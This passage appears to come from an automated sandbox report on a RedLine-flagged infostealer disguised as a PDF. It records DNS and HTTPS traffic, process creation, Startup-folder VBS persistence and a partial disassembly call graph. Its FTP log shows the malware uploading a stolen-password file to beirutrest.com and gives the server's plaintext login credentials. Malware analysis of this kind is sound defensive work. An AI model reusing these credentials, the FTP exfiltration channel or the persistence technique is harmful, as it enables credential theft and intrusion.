                            Sep 26, 2024 05:34:08.701044083 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:08.701086044 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:08.701196909 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:08.708848953 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:08.708861113 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.327076912 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.327172041 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:09.330487967 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:09.330507040 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.330817938 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.371786118 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:09.387185097 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:09.427401066 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.509831905 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.509886980 CEST44349712104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:09.509933949 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:09.576704979 CEST49712443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:10.663538933 CEST4971321192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:10.671479940 CEST214971350.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:10.671879053 CEST4971321192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:10.778286934 CEST4971321192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:10.787424088 CEST214971350.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:10.790169954 CEST4971321192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:29.817735910 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:29.817790985 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:29.817857027 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:29.821077108 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:29.821095943 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.290071011 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.290174007 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.292515993 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.292524099 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.292865038 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.340605974 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.351599932 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.395410061 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.472340107 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.472413063 CEST44349718104.26.12.205192.168.2.6
                            Sep 26, 2024 05:34:30.472476959 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.475261927 CEST49718443192.168.2.6104.26.12.205
                            Sep 26, 2024 05:34:30.993419886 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:30.998836040 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:30.998934031 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:31.562532902 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:31.566306114 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:31.571149111 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:31.816140890 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:31.818332911 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:31.823242903 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.135926962 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.143429995 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.148220062 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.305547953 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.305730104 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.310653925 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.464019060 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.464160919 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.468925953 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.623011112 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.624847889 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.629885912 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.796765089 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.797358036 CEST4972035284192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.803307056 CEST352844972050.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:32.803380966 CEST4972035284192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.803494930 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:32.809357882 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:33.314507961 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:33.314889908 CEST4972035284192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:33.314889908 CEST4972035284192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:33.321314096 CEST352844972050.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:33.321345091 CEST352844972050.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:33.321439981 CEST4972035284192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:33.356184006 CEST4971921192.168.2.650.87.144.157
                            Sep 26, 2024 05:34:33.483603954 CEST214971950.87.144.157192.168.2.6
                            Sep 26, 2024 05:34:33.528081894 CEST4971921192.168.2.650.87.144.157

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 26, 2024 05:34:08.679580927 CEST6434853192.168.2.61.1.1.1
                            Sep 26, 2024 05:34:08.695564032 CEST53643481.1.1.1192.168.2.6
                            Sep 26, 2024 05:34:10.119448900 CEST6306253192.168.2.61.1.1.1
                            Sep 26, 2024 05:34:10.631589890 CEST53630621.1.1.1192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 26, 2024 05:34:08.679580927 CEST192.168.2.61.1.1.10x6206Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                            Sep 26, 2024 05:34:10.119448900 CEST192.168.2.61.1.1.10x30dfStandard query (0)beirutrest.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 26, 2024 05:34:08.695564032 CEST1.1.1.1192.168.2.60x6206No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                            Sep 26, 2024 05:34:08.695564032 CEST1.1.1.1192.168.2.60x6206No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                            Sep 26, 2024 05:34:08.695564032 CEST1.1.1.1192.168.2.60x6206No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                            Sep 26, 2024 05:34:10.631589890 CEST1.1.1.1192.168.2.60x30dfNo error (0)beirutrest.com50.87.144.157A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • api.ipify.org

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649712104.26.12.2054436704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            TimestampBytes transferredDirectionData
                            2024-09-26 03:34:09 UTC155OUTGET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                            2024-09-26 03:34:09 UTC211INHTTP/1.1 200 OK
                            Date: Thu, 26 Sep 2024 03:34:09 GMT
                            Content-Type: text/plain
                            Content-Length: 11
                            Connection: close
                            Vary: Origin
                            CF-Cache-Status: DYNAMIC
                            Server: cloudflare
                            CF-RAY: 8c90325518704387-EWR
                            2024-09-26 03:34:09 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                            Data Ascii: 8.46.123.33


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.649718104.26.12.2054436828C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            TimestampBytes transferredDirectionData
                            2024-09-26 03:34:30 UTC155OUTGET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                            2024-09-26 03:34:30 UTC211INHTTP/1.1 200 OK
                            Date: Thu, 26 Sep 2024 03:34:30 GMT
                            Content-Type: text/plain
                            Content-Length: 11
                            Connection: close
                            Vary: Origin
                            CF-Cache-Status: DYNAMIC
                            Server: cloudflare
                            CF-RAY: 8c9032d808ec4349-EWR
                            2024-09-26 03:34:30 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                            Data Ascii: 8.46.123.33


                            FTP Packets

                            TimestampSource PortDest PortSource IPDest IPCommands
                            Sep 26, 2024 05:34:31.562532902 CEST214971950.87.144.157192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21.220-IPv6 connections are also welcome on this server.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                            Sep 26, 2024 05:34:31.566306114 CEST4971921192.168.2.650.87.144.157USER belogs@beirutrest.com
                            Sep 26, 2024 05:34:31.816140890 CEST214971950.87.144.157192.168.2.6331 User belogs@beirutrest.com OK. Password required
                            Sep 26, 2024 05:34:31.818332911 CEST4971921192.168.2.650.87.144.157PASS 9yXQ39wz(uL+
                            Sep 26, 2024 05:34:32.135926962 CEST214971950.87.144.157192.168.2.6230 OK. Current restricted directory is /
                            Sep 26, 2024 05:34:32.305547953 CEST214971950.87.144.157192.168.2.6504 Unknown command
                            Sep 26, 2024 05:34:32.305730104 CEST4971921192.168.2.650.87.144.157PWD
                            Sep 26, 2024 05:34:32.464019060 CEST214971950.87.144.157192.168.2.6257 "/" is your current location
                            Sep 26, 2024 05:34:32.464160919 CEST4971921192.168.2.650.87.144.157TYPE I
                            Sep 26, 2024 05:34:32.623011112 CEST214971950.87.144.157192.168.2.6200 TYPE is now 8-bit binary
                            Sep 26, 2024 05:34:32.624847889 CEST4971921192.168.2.650.87.144.157PASV
                            Sep 26, 2024 05:34:32.796765089 CEST214971950.87.144.157192.168.2.6227 Entering Passive Mode (50,87,144,157,137,212)
                            Sep 26, 2024 05:34:32.803494930 CEST4971921192.168.2.650.87.144.157STOR PW_user-123716_2024_09_25_23_34_30.html
                            Sep 26, 2024 05:34:33.314507961 CEST214971950.87.144.157192.168.2.6150 Accepted data connection
                            Sep 26, 2024 05:34:33.483603954 CEST214971950.87.144.157192.168.2.6226-File successfully transferred
                            226-File successfully transferred226 0.171 seconds (measured here), 1.99 Kbytes per second

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:23:33:58
                            Start date:25/09/2024
                            Path:C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:23:34:03
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 34%, ReversingLabs
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:23:34:07
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
                            Imagebase:0x780000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:23:34:15
                            Start date:25/09/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                            Imagebase:0x7ff63a0d0000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:23:34:16
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:23:34:20
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x2a0000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:23:34:20
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:9
                            Start time:23:34:24
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:23:34:24
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:11
                            Start time:23:34:28
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0xac0000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.2%
                              Dynamic/Decrypted Code Coverage:0.5%
                              Signature Coverage:9.6%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:35
                              execution_graph 86110 4010e0 86113 401100 86110->86113 86112 4010f8 86114 401113 86113->86114 86116 401120 86114->86116 86117 401184 86114->86117 86118 40114c 86114->86118 86144 401182 86114->86144 86115 40112c DefWindowProcW 86115->86112 86116->86115 86172 401000 Shell_NotifyIconW __recalloc 86116->86172 86151 401250 86117->86151 86119 401151 86118->86119 86120 40119d 86118->86120 86122 401219 86119->86122 86123 40115d 86119->86123 86124 42afb4 86120->86124 86128 4011a3 86120->86128 86122->86116 86132 401225 86122->86132 86125 401163 86123->86125 86129 42b01d 86123->86129 86167 40f190 10 API calls 86124->86167 86130 42afe9 86125->86130 86131 40116c 86125->86131 86128->86116 86135 4011b6 KillTimer 86128->86135 86136 4011db SetTimer RegisterWindowMessageW 86128->86136 86129->86115 86171 4370f4 52 API calls 86129->86171 86169 40f190 10 API calls 86130->86169 86131->86116 86139 401174 86131->86139 86183 468b0e 74 API calls __recalloc 86132->86183 86133 401193 86133->86112 86134 42b04f 86173 40e0c0 86134->86173 86166 401000 Shell_NotifyIconW __recalloc 86135->86166 86136->86133 86137 401204 CreatePopupMenu 86136->86137 86137->86112 86168 45fd57 65 API calls __recalloc 86139->86168 86144->86115 86145 42afe4 86145->86133 86146 42b00e 86170 401a50 329 API calls 86146->86170 86147 4011c9 PostQuitMessage 86147->86112 86150 42afdc 86150->86115 86150->86145 86152 401262 __recalloc 86151->86152 86153 4012e8 86151->86153 86184 401b80 86152->86184 86153->86133 86155 40128c 86156 4012d1 KillTimer SetTimer 86155->86156 86157 4012bb 86155->86157 86158 4272ec 86155->86158 86156->86153 86159 4012c5 86157->86159 86160 42733f 86157->86160 86161 4272f4 Shell_NotifyIconW 86158->86161 86162 42731a Shell_NotifyIconW 86158->86162 86159->86156 86163 427393 Shell_NotifyIconW 86159->86163 86164 427348 Shell_NotifyIconW 86160->86164 86165 42736e Shell_NotifyIconW 86160->86165 86161->86156 86162->86156 86163->86156 86164->86156 86165->86156 86166->86147 86167->86133 86168->86150 86169->86146 86170->86144 86171->86144 86172->86134 86175 40e0e7 __recalloc 86173->86175 86174 40e142 86180 40e184 86174->86180 86282 4341e6 63 API calls __wcsicoll 86174->86282 86175->86174 86176 42729f DestroyIcon 86175->86176 86176->86174 86178 40e1a0 Shell_NotifyIconW 86181 401b80 54 API calls 86178->86181 86179 4272db Shell_NotifyIconW 86180->86178 86180->86179 86182 40e1ba 86181->86182 86182->86144 86183->86145 86185 401b9c 86184->86185 86205 401c7e 86184->86205 86206 4013c0 86185->86206 86188 42722b LoadStringW 86191 427246 86188->86191 86189 401bb9 86211 402160 86189->86211 86225 40e0a0 86191->86225 86192 401bcd 86194 427258 86192->86194 86195 401bda 86192->86195 86229 40d200 52 API calls 2 library calls 86194->86229 86195->86191 86197 401be4 86195->86197 86224 40d200 52 API calls 2 library calls 86197->86224 86199 427267 86200 42727b 86199->86200 86203 401bf3 _wcscpy __recalloc _wcsncpy 86199->86203 86230 40d200 52 API calls 2 library calls 86200->86230 86202 427289 86204 401c62 Shell_NotifyIconW 86203->86204 86204->86205 86205->86155 86231 4115d7 86206->86231 86212 426daa 86211->86212 86213 40216b _wcslen 86211->86213 86269 40c600 86212->86269 86216 402180 86213->86216 86217 40219e 86213->86217 86215 426db5 86215->86192 86268 403bd0 52 API calls ctype 86216->86268 86219 4013a0 52 API calls 86217->86219 86220 4021a5 86219->86220 86221 426db7 86220->86221 86222 4115d7 52 API calls 86220->86222 86223 402187 _memmove 86222->86223 86223->86192 86224->86203 86226 40e0b2 86225->86226 86227 40e0a8 86225->86227 86226->86203 86281 403c30 52 API calls _memmove 86227->86281 86229->86199 86230->86202 86233 4115e1 _malloc 86231->86233 86234 4013e4 86233->86234 86238 4115fd std::exception::exception 86233->86238 86245 4135bb 86233->86245 86242 4013a0 86234->86242 86235 41163b 86260 4180af 46 API calls std::exception::operator= 86235->86260 86237 411645 86261 418105 RaiseException 86237->86261 86238->86235 86259 41130a 51 API calls __cinit 86238->86259 86241 411656 86243 4115d7 52 API calls 86242->86243 86244 4013a7 86243->86244 86244->86188 86244->86189 86246 413638 _malloc 86245->86246 86254 4135c9 _malloc 86245->86254 86267 417f77 46 API calls __getptd_noexit 86246->86267 86249 4135f7 RtlAllocateHeap 86250 413630 86249->86250 86249->86254 86250->86233 86252 4135d4 86252->86254 86262 418901 46 API calls __NMSG_WRITE 86252->86262 86263 418752 46 API calls 6 library calls 86252->86263 86264 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86252->86264 86253 413624 86265 417f77 46 API calls __getptd_noexit 86253->86265 86254->86249 86254->86252 86254->86253 86257 413622 86254->86257 86266 417f77 46 API calls __getptd_noexit 86257->86266 86259->86235 86260->86237 86261->86241 86262->86252 86263->86252 86265->86257 86266->86250 86267->86250 86268->86223 86270 40c619 86269->86270 86271 40c60a 86269->86271 86270->86215 86271->86270 86274 4026f0 86271->86274 86273 426d7a _memmove 86273->86215 86275 426873 86274->86275 86276 4026ff 86274->86276 86277 4013a0 52 API calls 86275->86277 86276->86273 86278 42687b 86277->86278 86279 4115d7 52 API calls 86278->86279 86280 42689e _memmove 86279->86280 86280->86273 86281->86226 86282->86180 86283 40bd20 86284 428194 86283->86284 86285 40bd2d 86283->86285 86287 40bd43 86284->86287 86289 4281bc 86284->86289 86292 4281b2 86284->86292 86286 40bd37 86285->86286 86306 4531b1 85 API calls 5 library calls 86285->86306 86295 40bd50 86286->86295 86305 45e987 86 API calls ctype 86289->86305 86304 40b510 VariantClear 86292->86304 86294 4281ba 86296 426cf1 86295->86296 86297 40bd63 86295->86297 86316 44cde9 52 API calls _memmove 86296->86316 86307 40bd80 86297->86307 86300 40bd73 86300->86287 86301 426cfc 86302 40e0a0 52 API calls 86301->86302 86303 426d02 86302->86303 86304->86294 86305->86285 86306->86286 86308 40bd8e 86307->86308 86315 40bdb7 _memmove 86307->86315 86309 40bded 86308->86309 86310 40bdad 86308->86310 86308->86315 86312 4115d7 52 API calls 86309->86312 86317 402f00 86310->86317 86313 40bdf6 86312->86313 86314 4115d7 52 API calls 86313->86314 86313->86315 86314->86315 86315->86300 86316->86301 86318 402f0c 86317->86318 86319 402f10 86317->86319 86318->86315 86320 4115d7 52 API calls 86319->86320 86321 4268c3 86319->86321 86322 402f51 ctype _memmove 86320->86322 86322->86315 86323 425ba2 86328 40e360 86323->86328 86325 425bb4 86344 41130a 51 API calls __cinit 86325->86344 86327 425bbe 86329 4115d7 52 API calls 86328->86329 86330 40e3ec GetModuleFileNameW 86329->86330 86345 413a0e 86330->86345 86332 40e421 _wcsncat 86348 413a9e 86332->86348 86335 4115d7 52 API calls 86336 40e45e _wcscpy 86335->86336 86351 40bc70 86336->86351 86340 40e4a9 86340->86325 86341 401c90 52 API calls 86343 40e4a1 _wcscat _wcslen _wcsncpy 86341->86343 86342 4115d7 52 API calls 86342->86343 86343->86340 86343->86341 86343->86342 86344->86327 86370 413801 86345->86370 86400 419efd 86348->86400 86352 4115d7 52 API calls 86351->86352 86353 40bc98 86352->86353 86354 4115d7 52 API calls 86353->86354 86355 40bca6 86354->86355 86356 40e4c0 86355->86356 86412 403350 86356->86412 86358 40e4cb RegOpenKeyExW 86359 427190 RegQueryValueExW 86358->86359 86360 40e4eb 86358->86360 86361 4271b0 86359->86361 86362 42721a RegCloseKey 86359->86362 86360->86343 86363 4115d7 52 API calls 86361->86363 86362->86343 86364 4271cb 86363->86364 86419 43652f 52 API calls 86364->86419 86366 4271d8 RegQueryValueExW 86367 42720e 86366->86367 86368 4271f7 86366->86368 86367->86362 86369 402160 52 API calls 86368->86369 86369->86367 86371 41389e 86370->86371 86377 41381a 86370->86377 86372 4139e8 86371->86372 86374 413a00 86371->86374 86397 417f77 46 API calls __getptd_noexit 86372->86397 86399 417f77 46 API calls __getptd_noexit 86374->86399 86375 4139ed 86398 417f25 10 API calls __tsopen_nolock 86375->86398 86377->86371 86385 41388a 86377->86385 86392 419e30 46 API calls __tsopen_nolock 86377->86392 86380 41396c 86380->86371 86381 413967 86380->86381 86383 41397a 86380->86383 86381->86332 86382 413929 86382->86371 86384 413945 86382->86384 86394 419e30 46 API calls __tsopen_nolock 86382->86394 86396 419e30 46 API calls __tsopen_nolock 86383->86396 86384->86371 86384->86381 86388 41395b 86384->86388 86385->86371 86391 413909 86385->86391 86393 419e30 46 API calls __tsopen_nolock 86385->86393 86395 419e30 46 API calls __tsopen_nolock 86388->86395 86391->86380 86391->86382 86392->86385 86393->86391 86394->86384 86395->86381 86396->86381 86397->86375 86398->86381 86399->86381 86401 419f13 86400->86401 86402 419f0e 86400->86402 86409 417f77 46 API calls __getptd_noexit 86401->86409 86402->86401 86408 419f2b 86402->86408 86404 419f18 86410 417f25 10 API calls __tsopen_nolock 86404->86410 86407 40e454 86407->86335 86408->86407 86411 417f77 46 API calls __getptd_noexit 86408->86411 86409->86404 86410->86407 86411->86404 86413 403367 86412->86413 86414 403358 86412->86414 86415 4115d7 52 API calls 86413->86415 86414->86358 86416 403370 86415->86416 86417 4115d7 52 API calls 86416->86417 86418 40339e 86417->86418 86418->86358 86419->86366 86420 416454 86457 416c70 86420->86457 86422 416460 GetStartupInfoW 86423 416474 86422->86423 86458 419d5a HeapCreate 86423->86458 86425 4164cd 86426 4164d8 86425->86426 86541 41642b 46 API calls 3 library calls 86425->86541 86459 417c20 GetModuleHandleW 86426->86459 86429 4164de 86430 4164e9 __RTC_Initialize 86429->86430 86542 41642b 46 API calls 3 library calls 86429->86542 86478 41aaa1 GetStartupInfoW 86430->86478 86434 416503 GetCommandLineW 86491 41f584 GetEnvironmentStringsW 86434->86491 86438 416513 86497 41f4d6 GetModuleFileNameW 86438->86497 86440 41651d 86444 416528 86440->86444 86544 411924 46 API calls 3 library calls 86440->86544 86443 41652e 86445 416539 86443->86445 86545 411924 46 API calls 3 library calls 86443->86545 86501 41f2a4 86444->86501 86515 411703 86445->86515 86448 416541 86450 41654c __wwincmdln 86448->86450 86546 411924 46 API calls 3 library calls 86448->86546 86519 40d6b0 86450->86519 86453 41657c 86548 411906 46 API calls _doexit 86453->86548 86456 416581 __tsopen_nolock 86457->86422 86458->86425 86460 417c34 86459->86460 86461 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86459->86461 86549 4178ff 49 API calls _free 86460->86549 86463 417c87 TlsAlloc 86461->86463 86466 417cd5 TlsSetValue 86463->86466 86467 417d96 86463->86467 86464 417c39 86464->86429 86466->86467 86468 417ce6 __init_pointers 86466->86468 86467->86429 86550 418151 InitializeCriticalSectionAndSpinCount 86468->86550 86470 417d91 86558 4178ff 49 API calls _free 86470->86558 86472 417d2a 86472->86470 86551 416b49 86472->86551 86475 417d76 86557 41793c 46 API calls 4 library calls 86475->86557 86477 417d7e GetCurrentThreadId 86477->86467 86479 416b49 __calloc_crt 46 API calls 86478->86479 86490 41aabf 86479->86490 86480 41ac34 86481 41ac6a GetStdHandle 86480->86481 86484 41acce SetHandleCount 86480->86484 86485 41ac7c GetFileType 86480->86485 86488 41aca2 InitializeCriticalSectionAndSpinCount 86480->86488 86481->86480 86482 41abb4 86482->86480 86486 41abe0 GetFileType 86482->86486 86487 41abeb InitializeCriticalSectionAndSpinCount 86482->86487 86483 416b49 __calloc_crt 46 API calls 86483->86490 86489 4164f7 86484->86489 86485->86480 86486->86482 86486->86487 86487->86482 86487->86489 86488->86480 86488->86489 86489->86434 86543 411924 